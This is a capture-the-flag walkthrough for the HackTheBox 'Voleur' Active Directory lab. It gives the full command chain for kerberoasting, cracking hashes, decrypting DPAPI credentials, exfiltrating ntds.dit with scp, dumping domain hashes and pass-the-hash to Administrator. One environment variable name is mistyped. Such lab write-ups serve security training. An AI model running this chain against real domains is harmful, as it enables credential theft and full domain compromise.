HackTheBox Voleur Walkthrough

This was a medium AD machine with initial credentials ryan.naylor:HollowOct31Nyt and also ntlm was disabled will use kerberos.

Initial Enumeration

The nmap scan show nothing unusual just ssh at port 2222

also with bloodhound nothing much i got with initial user

Foothold and user.txt

First we will explore smb shares using

impacket-getTGT 'VOLEUR.HTB/ryan.naylor':'HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/ryan.naylor@dc.voleur.htb

the it share has a folder called First-Line Support and a file called Access_Review.xlsx but the file is password protected so using john will crack that

office2john Access_Review.xlsx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

after cracking the pass and opening the file from it , you will get a some account and password

with the help of this in bloodhound we can see that svc_ldap has writespn rights over svc_winrm

impacket-getTGT 'VOLEUR.HTB/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCANME=svc_ldap.ccache
python targetedKerberoast.py -k --dc-host dc.voleur.htb -d VOLEUR.HTB

crack the hash using john the ripper

john svcc_winrm.txt --wordlist=/usr/share/wordlists/rockyou.txt

now we will request tgt for user svc_winrm and access its shell

impacket-getTGT 'VOLEUR.HTB/svc_winrm':'<put_pass_here>'
export KRB5CCNAME=svc_winrm.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb

Privelege Escalation and root.txt

Now in Access_review.xlsx we can see that user todd.wolfe has a been deleted or marked as deleted , so first we will restore that using svc_ldap , why svc_ldap because the account is a member of Restore_Users group

bloodyAD --host dc.voleur.htb -d voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k set restore 'todd.wolfe'

use latest bloodyAD version , else you will get errors .

after restoring it ,we will move towards the smb of todd.wolfe and decrypt the pass of user jeremy.combs

impacket-getTGT 'VOLEUR.HTB/todd.wolfe':'<pass_here_of_todd>
export KRB5CCNAME=todd.wolfe.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb
use IT
cd /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/
get 772275FAD58525253490A9B0039791D3
cd /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110
get 08949382-134f-4c63-b93c-ce52efc0aa88

then decrypt using

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password '<pass_of_todd>' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

using this you will get pass of jeremy.combs

then we will access the smb shares of jeremy.combs and there we will find a note and id_rsa of ssh , the note said

here the admin is talking about svc_backup so we will access its ssh

ssh -i id_rsa svc_backup@voleur.htb -p 2222

after exploring the ssh and using linpeas i did get something which is ntds.dit which we will use to dump hashes of admin and other users , first we will go to /mnt/c/IT/Third-Line Support/Backups/Active Directory and copy the ntds.dit to tmp and then to /mnt/c/IT/Third-Line Support/Backups/registry and copy the SYSTEM file to /tmp then using scp service we will copy it to our machine

scp -i id_rsa -P 2222 svc_backup@voleur.htb:/tmp/ntds.dit /path/to/save
scp -i id_rsa -P 2222 svc_backup@voleur.htb:/tmp/SYSTEM /path/to/save

then we will use impacket-secretsdump to dump hashes locally

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

we will get the ntlm hash of admin , so we will get a tgt for him and access the shell so the root.txt

impacket-getTGT 'VOLEUR.HTB/Administrator' -hashes <LM:NT>
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb

This is it for this machine .

Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!